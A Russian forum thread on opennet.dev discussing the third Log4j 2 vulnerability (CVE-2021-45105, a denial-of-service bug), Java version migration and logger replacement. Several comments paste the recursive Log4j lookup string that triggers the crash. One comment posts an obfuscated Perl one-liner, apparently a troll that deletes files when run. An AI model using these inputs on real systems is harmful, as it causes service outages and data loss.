В библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45105), которая в отличие от двух прошлых проблем, отнесена к категории опасных, но не критических. Новая проблема позволяет вызвать отказ в обслуживании и проявляется в виде зацикливания и аварийного завершения при обработке определённых строк. Уязвимость устранена в опубликованном несколько часов назад выпуске Log4j 2.17. Опасность уязвимости сглаживает то, что проблема проявляется только на системах с Java 8...

Подробнее: https://www.opennet.dev/opennews/art.shtml?num=56370

• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 23:43 , 18-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 03:45 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 14:17 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 14:25 , 19-Дек-21
        • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Брат Анон, 18:32 , 19-Дек-21
          • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Заноним, 21:56 , 19-Дек-21
          • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 08:03 , 24-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 20:19 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Онаним, 07:07 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,commiethebeastie, 10:04 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 10:49 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 20:25 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 17:36 , 20-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,жорик, 23:02 , 21-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,жорик, 23:02 , 21-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,zloykakpes, 23:46 , 18-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 00:23 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Онаним, 09:48 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 10:50 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 08:04 , 24-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,all_glory_to_the_hypnotoad, 13:33 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 17:01 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 20:41 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 11:31 , 20-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,andy, 21:03 , 20-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 23:55 , 18-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,x3who, 00:22 , 19-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 00:31 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 00:41 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 04:36 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 08:15 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 11:33 , 20-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 13:39 , 21-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 00:39 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 11:41 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 15:09 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 11:34 , 20-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,MVK, 13:01 , 20-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 00:57 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,iZEN, 01:30 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 12:41 , 20-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 19:33 , 20-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 03:47 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,A.N. Onimous, 22:38 , 26-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 01:24 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 03:49 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 14:25 , 21-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 03:41 , 20-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Wilem82, 02:14 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Тинус Лорвальдс, 02:28 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Wilem82, 02:38 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Тинус Лорвальдс, 18:39 , 22-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 02:40 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Wilem82, 02:51 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Вася, 03:01 , 19-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,zog, 09:14 , 19-Дек-21
        • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Wilem82, 15:08 , 19-Дек-21
          • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 13:18 , 20-Дек-21
            • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Wilem82, 17:58 , 22-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 13:15 , 20-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 11:36 , 20-Дек-21
      • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,MVK, 13:05 , 20-Дек-21
        • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 15:36 , 20-Дек-21
          • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,MVK, 20:47 , 20-Дек-21
          • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 23:15 , 20-Дек-21
            • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Наме, 10:08 , 21-Дек-21
              • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,MVK, 11:31 , 21-Дек-21
              • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 11:17 , 22-Дек-21
• Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 03:43 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Cucumber, 06:43 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 08:13 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Andrey, 08:24 , 19-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 09:55 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 09:57 , 19-Дек-21
    • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Аноним, 08:05 , 24-Дек-21
  • Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают ...,Прохожий, 10:39 , 19-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 10:16 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Прохожий, 10:37 , 19-Дек-21
    • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 10:53 , 19-Дек-21
    • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 11:38 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 10:53 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Ordu, 01:22 , 20-Дек-21
    • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 08:17 , 20-Дек-21
      • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Ordu, 10:37 , 20-Дек-21
        • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Наме, 10:35 , 21-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Наме, 11:42 , 20-Дек-21
    • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 23:19 , 20-Дек-21
      • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Наме, 10:17 , 21-Дек-21
        • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 19:11 , 21-Дек-21
          • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,iZEN, 19:18 , 21-Дек-21
            • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 11:21 , 22-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 13:19 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 13:28 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 20:30 , 19-Дек-21
    • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,xrensgory, 21:14 , 19-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,pda, 18:05 , 19-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 07:45 , 20-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 08:11 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 08:13 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 10:04 , 20-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноньимъ, 08:20 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 10:07 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Sw00p aka Jerom, 11:32 , 20-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 09:06 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 11:51 , 20-Дек-21
  • Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним, 00:56 , 21-Дек-21
• Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8%...,Аноним12345, 12:40 , 20-Дек-21

Те, у кого по какой-то причине до сих пор нигде нет жавы во все щели, выдохнули. В очередной раз.

По апач продуктам вообще не страдаю, не пользуюсь совсем.

Apache Kafka смеётся тебе в лицо!

Есть redpanda

Только у тебя. А у нас в далеко не мелкой конторе -- кафка.

Снимем шляпу, помянем.

А log4j у вас есть? Большому кораблю - большую торпеду!

Что за хрень и почему её у меня ещё нет?!

Угу. Пара аппликух есть, но всё Not Affected, судя по приведённому листу, да и во внешний мир они не смотрят.

У меня Ignition, правда он всё равно только через ssh доступен.

Да успокойтесь. Не все используют log4j2, и не всех оно касается даже из тех, кто использует.

> не всех оно касается даже из тех, кто использует.

"У меня нет дыры, у меня нет дыры...", - это такая новая молитва, что ли?

Нет. Здравый расчёт и понимание архитектуры своих приложений и используемых ими библиотек.

${${::-${::-$${::-j}}}}

${${::-${::-$${::-j}}}}

Ну логично, в принципе. После нахождения уязвимости каждый старается по максимуму накинуть вариаций, как бы ей воспользоваться. После всей этой истории log4j будет пуленепробиваемым с отличной базой тестов для QA.

Спекулятивное выполнение уже стало пуленепробиваемым после всей той истори?

> После всей этой истории некоторые вариации так и останутся неопубликованными

Fixed

> log4j будет пуленепробиваемым

Или все плюнут на неё и просто будут использовать другой логгер. Благо, переходники с log4j на другие бакенды есть.

Отлично, а они эти чудные выражовывания реализуют? И если да, то они это секурно делают? :)

У log4j архитектор умственно отсталый, как и персонажи прикатывающие этот хлам себе в проекты. Потому не станет

покажи свой неумственноотсталый log4j

"Сначала добейся!" (с)

Потому что нужно стараться делать в рамках кодовой базы SE или ЕЕ, а не тянуть всякую хваль. Есть JUL. Он дубовый и простой. Он входит в стандартную библиотеку и его оперативно фиксят. Вот его и стоит использовать, а не всяких хлако-спринг с кучей индусятины в зависимостях.

syslog, слушает 514/udp, если rsyslog, то еще и tcp можно настроить, для гарантированной доставки. Не благодари.

Астрологи объявили неделю уязвимостей Log4j

астрологи из DARPA наверное

Хороший однако ящик Пандоры открыли в этом году

> в этом году

Кто сказал, что им не пользовались в предыдущих годах?!

Ну так открыли то в этом

Так сказать, уведомили, что давно вертели вас на.

Майки выкатили кор 6, им нужно потолкаться на уже сложившемся рынке. Вот и "открыли" протухшие консервы.

Как консервы могут протухнуть? Они же закрыты от внешней среды

С нормальными политиками fw исходящего траффика с продакшена риски можно заметно снизить.
Костыль до нормального патча всех проектов.

Почти всегда DNS-трафик разрешен, т.к. нужен. Пихаешь данные в base64 и отправляешь на свой поддомен, который обслуживает твой DNS сервер.
Как от этого защититься fw? Мне кажется, никак. Тут только какие-то хитрые IPS/IDS с анализом интенсивности трафика или сигнатурами по определенной структуре запросов. Или вы про первичное выкачивание java-класса?

Правильно настроенный fw не ограничивается tcp/udp портами in/out.
Все пихания данных по DNS через base64 это огромное кол-во TXT запросов с хоста в дмз, которые так же
нужно резать. Все крупные IPS это умеют уже с начала 10х годов, можно загуглить "block dns tunneling"

JNDI-запрос это не DNS-запрос.

>JNDI-запрос это не DNS-запрос

- если в качестве реестра не используется DNS-сервер, что возможно. Выпендрился чисто ради расширения юзерского кругозора

а что это за   Log4j  ?

Log4j — сторонняя библиотека логирования. В самой Java JRE/JDK есть собственная библиотека логирования, которая менее подвержена уязвимостям.

Спринг использует логфоджи в зависимостях.

Сам Спринг (spring-core) зависит от JCL, а в Spring Boot (spring-boot-starter-logging) по дефолту Logback.

Библиотека для троянов. Это надо же наумиться надо было разыменовывать внешние строки...

Leftpad

Нужно валидировать данные которые записываешь в лог!
А ещё нужно делать обесклычивание, как советуют местные эксперты.

Давным-давно в телеграммах писали так: "приеду завтра зпт встречайте тчк". Это так, для намёка современным индусам.

Тчк/зпт использовалось не потому что программисты индусы и не хотят записи в лог валидировать, а из за сложности переключения страниц в телеграфе

Написать такой логер в котором выполнение произвольного кода, это надо какую-то особую форму гениальности иметь

И какая там валидация должна быть? Нужно было код библиотеки прочитать и понять, что надо удалять хитрожопые подстановки, но тогда логика библиотеки перетечет в логику валидации. Вывод тут простой: библиотека логирования делала по умолчанию то, чего не должна была делать.

> Опасность уязвимости сглаживает то, что проблема проявляется только на системах с Java 8.

"Сглаживает"? Это как бы основная версия жавы в продакшене. В жаве 9 сломали обратную совместимость так сильно, что многие до сих пор мигрировать не могут.

кто в трезвом уме и здравой памяти будет переводить прод на java 9?

> кто в трезвом уме и здравой памяти будет переводить прод на java 9?

Её поддержка уже один раз чуть не закончилась. Но она таки когда-нибудь закончится. Кому-то это может по-барабану, но большие конторы так не могут - они обязаны соблюдать определённые правила. Например о том, что должна быть поддержка - используемые библиотеки должны официально поддерживаться, то есть для них выпускаются патчи при обнаружении проблем и всё такое.

Плюс сами библиотеки могут заканчивать поддержку старых версий жавы. Мир-то тоже не стоит на месте.

>> кто в трезвом уме и здравой памяти будет переводить прод на java 9?
> Её поддержка уже один раз чуть не закончилась. Но она таки когда-нибудь
> закончится. Кому-то это может по-барабану, но большие конторы так не могут
> - они обязаны соблюдать определённые правила. Например о том, что должна
> быть поддержка - используемые библиотеки должны официально поддерживаться, то есть для
> них выпускаются патчи при обнаружении проблем и всё такое.
> Плюс сами библиотеки могут заканчивать поддержку старых версий жавы. Мир-то тоже не
> стоит на месте.

с каких пор поддержка джавы 9 не закончилась? она закончилась с выходом джавы 10.

Ни разу не было проблем с миграцией на LTS. На Java 11 все отлично мигрируется.

> На Java 11 все отлично мигрируется.

Что такое "отлично"? Это когда ничего делать не надо, просто заменяешь 8 на 11 и всё само работает? Или всё-таки приходится обновлять мажорные версии зависимостей - спринга, гибера и прочего?

Отлично от миграции с 2 на 3 питон проекта сложнее Hello World.

Мы уже на Java 17 перешли, но нам проще, поскольку проект новый. А вы активно используете Unsafe и прочие вещи JVM, которые лишь для внутреннего использования?

> А вы активно используете Unsafe и прочие вещи JVM, которые лишь для внутреннего использования?

При чём тут "мы"? Этим всем пользуются популярные библиотеки. Перестают они этим пользоваться только в новых версиях, зачастую мажорных, ломающих обратную совместимость. Поэтому переход на J9+ тянет за собой огромные затраты по миграции чуть ли не всех библиотек на новые версии с переписыванием кода, а некоторые библиотеки вообще не имеют версии для J9+, поэтому приходится их выкидывать и переписывать код ранее от них зависящий.

Если у вас новый проект, то вы не "перешли" на J17, т.е. переходить не с чего - проект новый.  "Переход" имеет смысл в контексте уже существующего проекта, завязанного на J8, и таких проектов с 20-, 15-, 10-ти летней историей и кучей старого кода - навалом.

Можете привести пример таких экзотических библиотек? Что-то мне ни разу такие не попадались. Или это самописные?

> Можете привести пример таких экзотических библиотек? Что-то мне ни разу такие не
> попадались. Или это самописные?

Экзотические библиотеки с обратной несовместимостью при смене мажорной версии:

https://github.com/spring-projects/spring-framework/wiki/Upg...

Плюс все зависимости которые в связи с этим надо тоже обновить.

Плюс ещё одна экзотическая, самописная библа "Hibernate", и так далее.

Не говоря уже о том, что начиная с J9, из stdlib физически удалили некоторые API.

Там всего несколько мест на самом деле которые поменялись и могут сломать системы, например поведение Set когда не найден элемент. Если их не использовать активно, то все ок. И если какие-то библиотеки используют module, то придется дать права старому кода на доступ к внутренностям (но это уже болье вина самих библиотек чем приложения). Ну и еще нужно проверить поведение зависимостей. В остальном если не на проекте не увлекались экзотическими функциями, то переход делается сменой номерков с 8 на 11.

Да-да-да. Эталонные JEE работают только на 8-ке.

>Эталонные JEE работают только на 8-ке

- это Вы книге какого года издания прочли?

Пятая Рыба работает стабильно только на 8-ке. Для этого и книг никаких не надо.

>Пятая Рыба работает стабильно только на 8-ке

- дружище, зачем пятая то? Eclipse GlassFish 6.2.3 - вышел в ноябре и с версии 6.1 поддерживает Java 11. А можно и WildFly качнуть, он тоже давно Java 11 поддерживает (WildFly 24 и на Java 17 может)

GlassFish был эталоном 10 лет назад на сановских наработках. Но зачем его сейчас то использовать?.... Оракл там на развитие ресурсы почти не выделяет.

Рыбы как были эталонной реализацией, так ею и остаются. 6-тая ветка пока не стандартизирована. Поэтому 5-ка до сих пор актуальна. Это для тех, кто не хочет вот таких вот... сюрпризов. Для прочих -- есть спринг.

> Рыбы как были эталонной реализацией, так ею и остаются. 6-тая ветка пока
> не стандартизирована.

- брехня какая то: jakarta.ee/compatibility/#tab-9
И 6й GlassFish и WildFly 23 прошли тестирование на совместимость со спецификациями JakartaEE 9 и 9.1.

А при чём здесь Spring? В Spring Boot по-умолчанию log4j не используется. А вот проблемы c GlassFish при размещении Spring-приложений - это факт.

> зацикливание ... "${${::-${::-$${::-j}}}}"

Растаманы, где вы?! Как это починить самым безопасным языком в мире?

У растоманов шаблоны падают на этапе копиляции, а не в продакшене.

Потому-то они ничего написать не могут...

У растоманов логи с продакшена собираются на этапе компиляции. :)

Няша, ты ещё регулярные выражения не видел.
А как увидишь, сразу седым станешь.

И в регулярных выражениях тоже могут быть зацикливания

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!

p.s. это не то что вы подумали, это - для регулярок.

И вам доброго утречка, Евгений Ваганович.

кто может толково объяснить  почему этот log4j все пытаются патчить, а не заменят на что-нибудь другое?

Потому что пропатчить дешевле, чем заменить. Ваш Кэп.

> пропатчить дешевле

пока не получается - всё новые и новые дыры получаются.

По десять раз накатывать это шерето и оно до сих пор уязвимо. Там уже украли всю инфу какую можно было украсть.  

Потому что не в курсе, что есть адаптеры на другие логгеры - http://logback.qos.ch/manual/migrationFromLog4j.html . Ну и личная упоротость разработчиков.

Да, я могу объяснить.

1. Я сомневаюсь, что _все_ пытаются патчить, _вместо_ того, чтобы переползать.

2. Те, кто решил переползать закончат этот процесс ещё не скоро. Это может занять до полугода. И что ты им предложишь? Не патчить и жить с дырявым? Или уйти в оффлайн на это время?

3. log4j может использоваться депендансом, или несколькими. Так что мало свой код увести от lod4j, надо и чужой тоже.

4. Со временем дыры залатают. И когда это случится, вот сядут разрабы и задумаются: а собственно нахрена мы переползали?

5. Я читал мнение в интернете, что по-крайней мере первая дыра с ldap существовала благодаря обратной совместимости. Может разрабы log4j переосмыслят свой подход к обратной совместимости, перепилят синтаксис форматной строки, отломав оттуда 90% финтифлюшек, оставят ровно столько функционала, чтоб не более 5% зависимых проектов заметило бы изменение, и для этих 5% приделают опцию сборки "enable-deprecated-format-string"?

Короче, ещё рано делать выводы о том, отказывается ли кто-то или нет, и стоит ли овчинка выделки.

> переползать ... Это может занять до полугода

А, может, надо не переползать, а бежать? Тогда быстрее будет. Были времена, когда за год писали язык программирования + ось. Сейчас же программисты умеют только ползать от дыры к дыре.

>> переползать ... Это может занять до полугода
> А, может, надо не переползать, а бежать? Тогда быстрее будет.

Тебе нужна стабильность или скорость? Тут ситуация такая, что чем быстрее бежишь, чем дольше выходит. Программирование требует от программиста, чтобы тот _думал_ _головой_. А мышление требует времени. Те кто бежит -- те не думают, они пытаются решить проблему брутфорсом. Это работает ровно до тех пор, пока оно не перестаёт работать, и вот после этого уже не остаётся никакого выбора, кроме как выкинуть результат и начать заново.

> Были времена,
> когда за год писали язык программирования + ось.

Да, и Солнце было ярче, и память меряли в килобайтах. И те оси ничего не умели по сегодняшним меркам, и, соответственно, никому не нужны сегодня. Некоторые из языков программирования остались, но если ты присмотришься, они остались вовсе не потому, что нельзя сделать лучше, а потому, что переползать на новые и более подходящие для задачи языки сложнее, чем продолжать пользоваться убогими.

Хорошее ПО это прежде всего про деньги, а не про думающих программистов. Про очень большие деньги и длительные циклы возврата инвестиций. Т.е. хорошее ПО в нынешних экономических реалиях невозможно хотя бы по экономическим причинам.

Причина простая. Увы, большинство крупных проектов на Жабе, мягко скажем, крайне сложны своей бессистемностью и объёмом. Народ массово и бездумно использует чужой код, благо тянуть его через maven очень просто. Хвост зависимостей более-менее развитого проекта очень уж разухабист, а чаще всего в проекте просто нет людей, которые бы хоть как-то себе представляли весь "масштаб бедствия".

В любом более-менее современном пакетном менеджере для Java очень легко вырезать ненужные зависимости. И даже полная перепаковка со сборкой нужных классов для Java не проблема. log4j2 заменяется переходником на slf4j, и всё. В том то и дело, что проблема очень странная. Зачем так держаться за log4j2? Кто использует какие-то фичи из него, которых не хватает в slf4j?

Может быть, но по-моему, не меняется он легко в проекте, которому лет дцать, и у которого за это время группа разработки менялась сто раз. Это адский гемор.
В любом "пакетном менеджере" )))) Это в каком же? Везде maven. Вы знаете ещё какие-то? У шибко продвинутых bnd. Где-то в пыли gradle и ant.

gradle, maven, sbt, ivy, ... Откройте maven search и посмотрите - https://search.maven.org/artifact/org.springframework/spring...

И да, если в maven что-то сделать - это ужас-ужас, то в gradle чужие зависимости исключаются простым exclude. Как, впрочем, и миграция с maven на gradle в большинстве случаев проблем не вызывает. Но если вам нравится садомазо, то технически можете и в maven поправить.

> gradle, maven, sbt, ivy, ... Откройте maven search и посмотрите - https://search.maven.org/artifact/org.springframework/spring...
> И да, если в maven что-то сделать - это ужас-ужас, то в
> gradle чужие зависимости исключаются простым exclude.

      <exclusions>
        <exclusion>  <!-- declare the exclusion here -->
          <groupId>sample.ProjectB</groupId>
          <artifactId>Project-B</artifactId>
        </exclusion>
      </exclusions>

> Как, впрочем, и миграция с
> maven на gradle в большинстве случаев проблем не вызывает. Но если
> вам нравится садомазо, то технически можете и в maven поправить.

Можем использовать == используем. Садомазо с Gradle сами занимайтесь.

configurations.all {
    exclude group: "log4j", module: "log4j"
}

PS: нравится XML-программирование - пользуйтесь. Обычно люди хотят иметь удобный и надёжный инструмент....

${${::-${::-$${::-j}}}})))))

толстый троллинг

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

[:||||||||||:]

Вот это и есть opensource эффект миллиона глаз. В популярном пакете нашлась дыра и все на хайпе ринулись копать - что там есть ещё. :)

что-то из серии "Как за дешево провести аудит безопасности"

Кто конкретно внёс указанную уязвимость? С современными системами контроля версий выяснить это не составляет труда. Почему старательно обходятся вопросы персональной ответственности разработчика? Или лицензия на этот самый Log4j не даёт возможность привлекать разработчиков? Тогда почему сотни проектов используют код, за который никто и никак не отвечает? Всё это очень странно.

Ты даже и MS не привлечёшь, таков путь.

А почему ты обходишь такой вопрос что ты можешь сам поиском найти коммиты и во всеуслышание всем написать имя виноватого? Неужели мировая закулисья добралась и до тебя?

>защита от неконтролируемой рекурсии

Похоже я узнал о существовании чего-то о чём мне не стоило знать.

Да факт существования такой защиты это секрет. Не стоит вскрывать эту тему. Ты молодой, шутливый, тебе все легко. Это не то. Это не Чикатило и даже не архивы спецслужб. Сюда лучше не лезть. Серьезно, ты будешь жалеть. Лучше закрой тему и забудь, что тут писалось. Я вполне понимаю, что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.

глубина рекурсии

Наверное еще и логи бинарные у этого говна.

Бинарные?! Это ущемляет интересы меньшинств!

> логи бинарные

Как не стыдно такое говорить! Логов - множество разновидностей: гомонарные, лезбинарные, транснарные...

Жаба уже никогда не будет прежней